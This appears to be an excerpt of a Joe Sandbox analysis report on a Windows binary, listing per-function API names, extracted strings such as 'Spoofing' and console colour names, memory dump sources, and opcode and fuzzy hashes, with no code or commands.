                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C91EB26D2F78247E7039B3AA4011A8E364BFE7684F91D323FA4471956FF69E1C68704

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1580 7ff60c47d847-7ff60c47d862 1581 7ff60c47d864-7ff60c47d873 FindWindowA 1580->1581 1582 7ff60c47d830-7ff60c47d844 1580->1582 1583 7ff60c47d87a-7ff60c47d88b 1581->1583 1584 7ff60c47d875 call 7ff60c4751c0 1581->1584 1582->1580 1586 7ff60c47d996-7ff60c47d9a5 FindWindowA 1583->1586 1587 7ff60c47d891-7ff60c47d894 1583->1587 1584->1583 1590 7ff60c47d9ac-7ff60c47d9e8 1586->1590 1591 7ff60c47d9a7 call 7ff60c475ee0 1586->1591 1588 7ff60c47d96a-7ff60c47d96e 1587->1588 1589 7ff60c47d89a-7ff60c47d968 1587->1589 1592 7ff60c47d970-7ff60c47d994 1588->1592 1589->1586 1591->1590 1592->1586 1592->1592
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FindWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 134000473-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 058175574267c0ddd2c0fd86945cecfff5cc0b0eb9aa3038a53ca311cf2f50bc
                                                                                                                                                                                                                                                                                      • Instruction ID: 91731cae0dab455964a0a56b1397aee5a0cfa25c34ebbcc88a941d38f6cff811
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 058175574267c0ddd2c0fd86945cecfff5cc0b0eb9aa3038a53ca311cf2f50bc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB41C767E24F8644F7039B3884020F9E3A8AF6B2C9B56D337E95C75557EF25B1868304
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: system
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3377271179-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 95dc2607038c881f536aee66d3e8c526958de578a22b0845a185818a222c8a5b
                                                                                                                                                                                                                                                                                      • Instruction ID: ae5d8f178a509fe3f5913e54cc7eae908e0aae1bae069577e0331ed78a94549c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95dc2607038c881f536aee66d3e8c526958de578a22b0845a185818a222c8a5b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CF06212714A8946E7058B2884851EC63A9FF68389B8A9633DF989A261DE25E94FC350
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AsyncState
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 425341421-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b91efae5ffcdf344abdb6d09e3289618f19d50db8f34a1c3d6214a1a743d896c
                                                                                                                                                                                                                                                                                      • Instruction ID: 0e98086d61a8b5b5a17096fc9db832add15b4132b9372636cd4dbe255dfc1895
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b91efae5ffcdf344abdb6d09e3289618f19d50db8f34a1c3d6214a1a743d896c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CC09220E2D65381FD68372924021BC03303F29F0CF704639DC0BE0081ED9FA4052321
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AsyncState
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 425341421-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 000d512ec0ffd0f25dd033b5c78418f9e683faf5e7162d176e2696d53ae28587
                                                                                                                                                                                                                                                                                      • Instruction ID: bc0ebc2b3a06c469fcab85b92511abf4461ab13a3c3f376df78cd6b44e4b5790
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 000d512ec0ffd0f25dd033b5c78418f9e683faf5e7162d176e2696d53ae28587
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4C09260E2C25382FA6C3B201412A7D12207F20B0CF700739C50AC0081CD1EA4452302
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF60C472B30: _Query_perf_frequency.MSVCP140 ref: 00007FF60C472B3D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF60C472B30: _Query_perf_counter.MSVCP140 ref: 00007FF60C472B46
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(?,?,?,00007FF60C472DC4), ref: 00007FF60C47FC0A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Query_perf_counterQuery_perf_frequencySleep
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2072706261-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 80351ea4c6dbb19d127f0b0bc4961175642fba98dbdcd305428a0454b0dbd93d
                                                                                                                                                                                                                                                                                      • Instruction ID: f6573dc9f4c39bdca443a446fab964e21fae429b99a0266c9e40d194f5e3ed49
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80351ea4c6dbb19d127f0b0bc4961175642fba98dbdcd305428a0454b0dbd93d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6611082173E68A81EE14CF15E15007A5351FF88BD4BA85631FE5E4B7DADD2CE4465300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: system$Sleep$Beep
                                                                                                                                                                                                                                                                                      • String ID: <*tur]$S]A3$color 7
                                                                                                                                                                                                                                                                                      • API String ID: 709286968-1521209349
                                                                                                                                                                                                                                                                                      • Opcode ID: 056e6ac85f4803fc0739af733d1f1525fcbd56564d82660dac151d556d39cd67
                                                                                                                                                                                                                                                                                      • Instruction ID: e1a6441b4228a0849f49655e49c326311a73cfbb4072d8a17272802ab167a174
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 056e6ac85f4803fc0739af733d1f1525fcbd56564d82660dac151d556d39cd67
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21C2E56BE2AB824AF703963590034E8E364AFB72C8761E323FD5471953FF6971D64248
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: system$Window$Console$ShowV01@$??6?$basic_ostream@BeepD@std@@@std@@TitleU?$char_traits@V01@@_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                      • String ID: Spoofing$1$2$3$4$5$6$7$9$S]A3$\FX5$\FX5$p
                                                                                                                                                                                                                                                                                      • API String ID: 419445211-2105776090
                                                                                                                                                                                                                                                                                      • Opcode ID: ee0aef86ad6f57fadd7fa4e71421718e5066e728cb3da6bcf7a5b9398f546951
                                                                                                                                                                                                                                                                                      • Instruction ID: 8aefeb8d7bed31b3b57ef59cde000fe9d40abce1268dcfb28131cdedd0887452
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee0aef86ad6f57fadd7fa4e71421718e5066e728cb3da6bcf7a5b9398f546951
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86421926D2DB8286F7039B3594010A9E764BFAB788F61D323FD4871967EF69B1C58304
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handleabort
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4293554670-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 75b629a59be3161a0e09e6d7e4cb0b684cbc96267df04c1b36ccbcfa556f74f8
                                                                                                                                                                                                                                                                                      • Instruction ID: ee6f2fd74fd355266aa632733d93e612cecbe753cfc129fb8cc0a18d9560c5f9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75b629a59be3161a0e09e6d7e4cb0b684cbc96267df04c1b36ccbcfa556f74f8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E916131B09A0346F6748F25A814A7D66A0BF45BB8F680335D96EC76E4DFFCE4498780
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: system$Beep$Window$ConsoleShow
                                                                                                                                                                                                                                                                                      • String ID: botbT$nwcS$pclueU
                                                                                                                                                                                                                                                                                      • API String ID: 2870283393-2356754995
                                                                                                                                                                                                                                                                                      • Opcode ID: 9744f00ff6324d04a564e724df3c4705a51451b54433f11523e9e6f1236f4679
                                                                                                                                                                                                                                                                                      • Instruction ID: 3b884c9aa41b7c52da86b1dc33ed57d82cef1ffdb60653aec97945a94af242a0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9744f00ff6324d04a564e724df3c4705a51451b54433f11523e9e6f1236f4679
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F572EC2AE2FB854BF7039B36C0410E8E364AFB7289791D723FD0475952FF66A1C68244
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_taskmemcpy$_invalid_parameter_noinfo_noreturnmallocmemcmp
                                                                                                                                                                                                                                                                                      • String ID: Sep 29 2024$aqua$black$blue$bright white$green$grey$light aqua$light blue$light green$light purple$light red$light yellow$purple$red$white$yellow
                                                                                                                                                                                                                                                                                      • API String ID: 1098268519-3580839344
                                                                                                                                                                                                                                                                                      • Opcode ID: b46fd6eb3ba7979996a5e01a30d0311cb1f721227035dab0d741cfb47dced131
                                                                                                                                                                                                                                                                                      • Instruction ID: 80bf31a766f8c961d73bcbe6c9659ca9ada0bdbc22ef295b00de2552bdfb778d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b46fd6eb3ba7979996a5e01a30d0311cb1f721227035dab0d741cfb47dced131
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D824362D24BC685E721CF31D8417ED6760FF9534CF609326EA4C66959EFB8A2D8C380
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: system
                                                                                                                                                                                                                                                                                      • String ID: botbT$nwcS
                                                                                                                                                                                                                                                                                      • API String ID: 3377271179-349844738
                                                                                                                                                                                                                                                                                      • Opcode ID: d1e8adffac3dfd90aae182edfe9916b818c3d113d7506d54e3242298f3a4dfbf
                                                                                                                                                                                                                                                                                      • Instruction ID: eacd5283dbfba2a3cef146c6995c54dfb0c6252531d310f40c57cd4e39283a4e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1e8adffac3dfd90aae182edfe9916b818c3d113d7506d54e3242298f3a4dfbf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C52CD2AE2FB854BF7039B36C4410E8E364AFB7288791D727FD0471952FF6661C68244
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 313767242-0
                                                                                                                                                                                                                                                                                      • Opcode ID: fc11572751ea45c479550a744bd1f1c76e7a9edfc562307dab2839986a3a720e
                                                                                                                                                                                                                                                                                      • Instruction ID: e1bca4151b927963bfb991911f8ec20c943e9331151be112fddc4cc4db316da1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc11572751ea45c479550a744bd1f1c76e7a9edfc562307dab2839986a3a720e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08311972A09B8186EB608F60E890BED6370FB85748F54403ADA4E87B99EF78D54CC750
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 42e164e1ce01010094fc2073279d0744961104dd61cd2b426d1c75f96b0cf214
                                                                                                                                                                                                                                                                                      • Instruction ID: ea211bd2e9db5190a843d32e50de224d6a52b3d552f05f5c2fa324afb7dbce26
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42e164e1ce01010094fc2073279d0744961104dd61cd2b426d1c75f96b0cf214
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2111822B15B018AEB009F60E8556AC33B4FB19B58F540A31DA6D867A4DFBCD1988380
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FormatInfoLocaleMessage
                                                                                                                                                                                                                                                                                      • String ID: !x-sys-default-locale
                                                                                                                                                                                                                                                                                      • API String ID: 4235545615-2729719199
                                                                                                                                                                                                                                                                                      • Opcode ID: 7653233c43f31b5df983f835fd562537dc6a1dcded3648984f36faf25958ae2e
                                                                                                                                                                                                                                                                                      • Instruction ID: 4d8430b3c601bb28b9978d0353696e7ad5d88406343490ed171d9a04f91db1ae
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7653233c43f31b5df983f835fd562537dc6a1dcded3648984f36faf25958ae2e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE018471F1878182F7258B12B450B6E67A1FF8478CF648035DA4996B99CFBCD509C780
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3725859331.00007FF60C471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF60C470000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3723932571.00007FF60C470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727762825.00007FF60C485000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3727848339.00007FF60C48A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3728777539.00007FF60C48B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff60c470000_UY9hUZn4CQ.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 3ec6b8f6739a1e160de22c0e82413228e03d75ae698e7dde7b0cb9309021089e
                                                                                                                                                                                                                                                                                      • Instruction ID: 082898491c1363acb5432e5838800731549a6b96c7bbb28121488453543fd512
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ec6b8f6739a1e160de22c0e82413228e03d75ae698e7dde7b0cb9309021089e
